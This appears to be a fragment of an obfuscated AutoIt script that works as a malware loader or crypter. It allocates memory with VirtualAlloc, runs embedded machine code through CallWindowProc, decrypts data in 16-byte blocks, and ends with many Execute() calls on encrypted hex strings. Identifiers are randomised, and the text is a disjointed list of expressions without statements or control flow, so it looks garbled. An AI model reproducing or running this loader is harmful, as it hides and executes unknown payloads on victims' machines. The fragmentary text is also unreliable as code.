DllCall("kernel32.dll","ptr","VirtualAlloc","ptr",$DA16496978B0999B,"ulong_ptr",$DA16396378B0999B,"dword",$DA1639697810999B,"dword",$DA1639697890999B)
@error 
SetError(@error,@extended, 0 )
DllCall("kernel32.dll","bool","VirtualFree","ptr",$DA16496978B0999B,"ulong_ptr",$DA16396378B0999B,"dword",$DA16396B78B0999B)
@error 
SetError(@error,@extended, False )
_DA10366978B0999B($DA16396918B0999B, 0 ,$DA16398978B0999B)
Not IsDllStruct($DA1639C978B0999B) 
@AutoItX64 
String(_DA16378978B0999B($DA16396976B0999B))
StringInStr($DA16396C78B0999B,"87DB")
StringInStr($DA16396C78B0999B,"87C9")
StringInStr($DA16396C78B0999B,"87D2")
StringInStr($DA16396C78B0999B,"87F6")
StringInStr($DA16396C78B0999B,"09C0")
StringInStr($DA16396C78B0999B,"09DB")
StringInStr($DA16396C78B0999B,"09C9")
StringInStr($DA16396C78B0999B,"09D2")
StringInStr($DA16396C78B0999B,"09F6")
StringInStr($DA16396C78B0999B,"09FF")
StringInStr($DA16396C78B0999B,"09E4")
StringInStr($DA16396C78B0999B,"09ED")
Binary($DA16396C78B0999B)
_DA163A697870999B( 0 ,BinaryLen($DA16396C78B0999B),$DA1639F978B0999B,$DA163969A8B0999B)
DllStructCreate("byte["&BinaryLen($DA16396C78B0999B)&"]",$DA16396918B0999B)
DllStructSetData($DA1639C978B0999B, 1 ,$DA16396C78B0999B)
OnAutoItExitRegister("_DA1639497810999B")
Binary($DA163D6978B0999B)
BinaryLen($DA163D6978B0999B)
DllStructCreate("byte["&$DA163969E8B0999B&"]")
DllStructSetData($DA16376978B0999B, 1 ,$DA163D6978B0999B)
DllStructGetData($DA16376978B0999B, 1 )
Not IsDllStruct($DA1639C978B0999B) 
_DA1A356978B0999B()
_DA1639B9D8B0999B($DA163D6978B0999B)
DllStructCreate("byte[244]")
DllStructCreate("byte["&BinaryLen($DA163D6978B0999B)&"]")
DllStructSetData($DA16396178B0999B, 1 ,$DA163D6978B0999B)
DllCall("user32.dll","none","CallWindowProc","ptr",DllStructGetPtr($DA1639C978B0999B)+$DA16396908B0999B,"ptr",DllStructGetPtr($DA16393978B0999B),"ptr",DllStructGetPtr($DA16396178B0999B),"uint",BinaryLen($DA163D6978B0999B)* 8 ,"int", 0 )
Not IsDllStruct($DA1639C978B0999B) 
_DA1A356978B0999B()
_DA1639B9D8B0999B($DA163D6978B0999B)
DllStructCreate("byte[244]")
DllStructCreate("byte["&BinaryLen($DA163D6978B0999B)&"]")
DllStructSetData($DA16396178B0999B, 1 ,$DA163D6978B0999B)
DllCall("user32.dll","none","CallWindowProc","ptr",DllStructGetPtr($DA1639C978B0999B)+$DA1639697AB0999B,"ptr",DllStructGetPtr($DA16393978B0999B),"ptr",DllStructGetPtr($DA16396178B0999B),"uint",BinaryLen($DA163D6978B0999B)* 8 ,"int", 0 )
Not IsDllStruct($DA1639C978B0999B) 
_DA1A356978B0999B()
Not IsDllStruct($DA16393978B0999B) 
SetError( 1 , 0 ,Binary(""))
Binary($DA16336978B0999B)
Ceiling(BinaryLen($DA16336978B0999B)/ 16 )
$DA16390978B0999B= 0 
SetError( 1 , 0 ,Binary(""))
DllStructCreate("byte["&$DA16390978B0999B&"]")
DllStructSetData($DA16396971B0999B, 1 ,$DA16336978B0999B)
DllStructCreate("byte[16]")
DllStructSetData($DA16396979B0999B, 1 ,$DA16396F78B0999B)
DllCall("user32.dll","none","CallWindowProc","ptr",DllStructGetPtr($DA1639C978B0999B)+$DA16396968B0999B,"ptr",DllStructGetPtr($DA16393978B0999B),"ptr",DllStructGetPtr($DA16396971B0999B),"uint",$DA16390978B0999B,"ptr",DllStructGetPtr($DA16396979B0999B))
DllStructGetData($DA16396979B0999B, 1 )
DllStructGetData($DA16396971B0999B, 1 )
Not IsDllStruct($DA1639C978B0999B) 
_DA1A356978B0999B()
Not IsDllStruct($DA16393978B0999B) 
SetError( 1 , 0 ,Binary(""))
Binary($DA16336978B0999B)
BinaryLen($DA16336978B0999B)
$DA16390978B0999B= 0 
SetError( 1 , 0 ,Binary(""))
DllStructCreate("byte["&$DA16390978B0999B&"]")
DllStructSetData($DA16396971B0999B, 1 ,$DA16336978B0999B)
DllStructCreate("byte[16]")
DllStructSetData($DA16396979B0999B, 1 ,$DA16396F78B0999B)
DllCall("user32.dll","none","CallWindowProc","ptr",DllStructGetPtr($DA1639C978B0999B)+$DA16396973B0999B,"ptr",DllStructGetPtr($DA16393978B0999B),"ptr",DllStructGetPtr($DA16396971B0999B),"uint",$DA16390978B0999B,"ptr",DllStructGetPtr($DA16396979B0999B))
DllStructGetData($DA16396979B0999B, 1 )
DllStructGetData($DA16396971B0999B, 1 )
Not IsDllStruct($DA1639C978B0999B) 
_DA1A356978B0999B()
Not IsDllStruct($DA16393978B0999B) 
SetError( 1 , 0 ,Binary(""))
Binary($DA16336978B0999B)
BinaryLen($DA16336978B0999B)
$DA16390978B0999B= 0 
SetError( 1 , 0 ,Binary(""))
DllStructCreate("byte["&$DA16390978B0999B&"]")
DllStructSetData($DA16396971B0999B, 1 ,$DA16336978B0999B)
DllStructCreate("byte[16]")
DllStructSetData($DA16396979B0999B, 1 ,$DA16396F78B0999B)
DllCall("user32.dll","none","CallWindowProc","ptr",DllStructGetPtr($DA1639C978B0999B)+$DA16396938B0999B,"ptr",DllStructGetPtr($DA16393978B0999B),"ptr",DllStructGetPtr($DA16396971B0999B),"uint",$DA16390978B0999B,"ptr",DllStructGetPtr($DA16396979B0999B))
DllStructGetData($DA16396979B0999B, 1 )
DllStructGetData($DA16396971B0999B, 1 )
_DA18396971B0999B($DA16393978B0999B,$DA16396F78B0999B,$DA16336978B0999B)
BinaryLen($DA16336978B0999B)
BinaryMid($DA16336978B0999B,$DA1639697CB0999B, 1 )=Binary("0x80") 
BinaryMid($DA16336978B0999B, 1 ,$DA1639697CB0999B- 1 )
Binary($DA16336978B0999B)
BinaryLen($DA16336978B0999B)<= 16 
SetError( 1 , 0 ,Binary(""))
BinaryMid($DA16336978B0999B, 1 , 16 )
BinaryMid($DA16336978B0999B, 17 )
String($DA16395978B0999B)
_DA163F6478B0999B($DA163D6978B0999B)
_DA163B6978A0999B($DA16393978B0999B,$DA16396F78B0999B,$DA16336978B0999B)
_DA163F6478B0999B($DA163D6978B0999B)
_DA16396918F0999B($DA16393978B0999B,$DA16396F78B0999B,$DA16336978B0999B)
_DA1639F97DB0999B($DA163D6978B0999B)
_DA1639697832999B($DA16393978B0999B,$DA16396F78B0999B,$DA16336978B0999B)
BinaryLen($DA16396928B0999B)= 0 
SetError( 1 , 0 ,Binary(""))
@AutoItX64 
StringInStr($DA16396C78B0999B,"89C0")
StringInStr($DA16396C78B0999B,"89D2")
StringInStr($DA16396C78B0999B,"89F6")
Binary($DA16396C78B0999B)
_DA163A697870999B( 0 ,BinaryLen($DA16396C78B0999B),$DA1639F978B0999B,$DA163969A8B0999B)
DllStructCreate("byte["&BinaryLen($DA16396C78B0999B)&"]",$DA1639D978B0999B)
DllStructSetData($DA16396778B0999B, 1 ,$DA16396C78B0999B)
DllStructCreate("byte[16]")
StringLen($DA16396976B0999B)
DllStructCreate("byte["&$DA16316978B0999B&"]")
DllCall("user32.dll","none","CallWindowProc","ptr",DllStructGetPtr($DA16396778B0999B)+$DA16396A78B0999B,"ptr",DllStructGetPtr($DA16346978B0999B),"int", 0 ,"int", 0 ,"int", 0 )
DllCall("user32.dll","int","CallWindowProc","ptr",DllStructGetPtr($DA16396778B0999B)+$DA163E6978B0999B,"str",$DA16396976B0999B,"uint",$DA16316978B0999B,"ptr",DllStructGetPtr($DA16366978B0999B),"ptr",DllStructGetPtr($DA16346978B0999B))
DllStructGetData(DllStructCreate("uint",DllStructGetPtr($DA16366978B0999B)), 1 )
DllStructCreate("byte["&($DA1639A978B0999B+ 16 )&"]")
DllCall("user32.dll","uint","CallWindowProc","ptr",DllStructGetPtr($DA16396778B0999B)+$DA163969D8B0999B,"ptr",DllStructGetPtr($DA16366978B0999B)+ 4 ,"ptr",DllStructGetPtr($DA163969C8B0999B),"int", 0 ,"int", 0 )
_DA10366978B0999B($DA1639D978B0999B, 0 ,$DA16398978B0999B)
BinaryMid(DllStructGetData($DA163969C8B0999B, 1 ), 1 ,$DA16396928B0999B[ 0 ])
Number($DA16399978B0999B)
Number($DA16399978B0999B)
_DA1A356978B0999B()
BinaryToString(_DA16E9A978B0999B($DA16396958B0999B[$DA1639B978B0999B],$DA1639697FB0999B))
Execute(_DA1939697DB0999B("0x25A0181CC6AA4FBB4CEF7DBF1ABF24A2A288CC3D0E85638DF64DB9967FEBBC48786F538D078490917A2B39A2C12268AB"))
Execute(_DA1939697DB0999B("0x42F9339E893110D8523AC1B0B7E32F21DBC3599C30691893A4D44121D7F448BB8557C827584BE7FCA7914399397CD6AA"))
Execute(_DA1939697DB0999B("0x25F2F9A2C55F54800B89CC9DF5FEE7CB1CFEE4437DD064CC92D0E48C22C04055798499594655B5B95B79D87349FFE168"))
Execute(_DA1939697DB0999B("0x05BFA51068A941E70205994EDB0BC7F9C6A496F957751F65C345CB39BF5F5643750AC13841CF5C2708693EF14E624C1780762AA20FB1BB0F1AE6E578769124722E24CE304DAA22EE4FBE75F0DD3F2C41"))
Execute(_DA1939697DB0999B("0x28D3A814D0276C5B4663B31BCB81DA8A0EF469BE529649633BB8A56B59A3093A1F203E747445A2BC1DCF8A81CF9564797F5BB88B26F698E8EA8DD1AD1337B350CF10F033D28E428C6721023AFE415BA05126A7F3C98D8A664A6C90F7D2FE7734"))
Execute(_DA1939697DB0999B("0x8C5865A0AD8BC8C9B96086345160DAEDD833F367F66F91C644B94D020637E7F81003B6809CAE1B233E0A4511129CCF5BA48077CB597DE290762631061E0BE324945A84F320A384BF07BB30664D6DE22A"))
Execute(_DA1939697DB0999B("0xAAC8FC910F6AE7975721F0A7F8BE02B32D680E8940A5DB03C34357CF12D64F92002685FAEC257389977F9A68F058F0A9792193837B55ECF9FDAFCADE8C4F35405115C935E20904626C29F2BCE8FECEADC49E2243602B4DC828FD32482B4EF61A"))
Execute(_DA1939697DB0999B("0xC13A0BBE14D6ECE1F4BA4C246DC92FD874B90FAA4DE58E69AC59B38F214612DBBF31A1EFF3C0C078122DC075DA7D27A69F100A07C046B4AE3DDED4945A0B920A"))
Execute(_DA1939697DB0999B("0x05D33BCD53F22CC29F6B5BB9C49FDF6829A5F2EE21114C534F76795AC8FD887FA4BCC74EA14B3A55D2ECA18AC142122278D6A1FE19191EC788E1322188C5EC0B"))
Execute(_DA1939697DB0999B("0x4B3769C1DEA098A4C8ACA918A8F534010A807F353EDDFFE0C2C86E7421811330E2579CC42DE7F5C9FBB03C19C1D7E04D"))
Execute(_DA1939697DB0999B("0x1F31B3310E6AF0EB64CBD45CA14165826A994EFDBD029C43B47C218D8FA773072F939B848AEB07DD316495AF70457317"))
Execute(_DA1939697DB0999B("0xDAA4A13DCF273AEACE62168E17F24DA8F0F73EBA6A79D77655F2803A73662F22CC42E2B5E88BC9C0A080EC44D450D11A0181DCC2E53D708C81CF31A1F8E8A151D3A96D5487B414EB931D74E29BDC955312F9E0F9475A5F170D9BE08C70C03DDF"))
Execute(_DA1939697DB0999B("0x5AA4DCB0A82139BC8996A5B6148C76ECA8E7074D17245DA412D7A734AAF94D49D5FF483ECD1CC6DD613F5344B29FCFD2"))
Execute(_DA1939697DB0999B("0x94368BD0631F17C3749D1289B1D141C2508560E81CCFBB70B424659AE1025838C630A6AF41E4C8429054A3A33BD113C72F62B59D40F6670060945666E02B3B0C82C1AFB7E32884F53CC544B671FA51052C6412B91EEE4B8F9C9EEEFBACDAC18B"))
Execute(_DA1939697DB0999B("0x2B442085AF0C8C2537A3EF1B36AB0650ACF1B8A0648356CA3119A1FC780E0B40959EC351DE234BF50D80693CFFC7DA69601BF8E6C8758C5C06E100637338AD8F6B010631B6FC947E50E5FAA7459F9591F395DA8E35663A23850D6772920E683C39DDC78AD3BDBC839F68796958D47D90"))
Execute(_DA1939697DB0999B("0x7387CFDD42B2E91B6BC4E4F38147050337D4BAA7F042634A3B24FA501CD1F8E3",3))
Execute(_DA1939697DB0999B("0xDF16D45EF6B1CA97570CB4585B20398CEF6C6315BB069DE5F153BD4794414EE2D860AEED89172F26184AF593E588C3A96C59AFB81C9AC0954EC4BD603ACDDE8B0E00C70A91DCA654FE36BE0BDEA47D40FB76EDC96E670A6ED346BDD7FAD639EB",3))
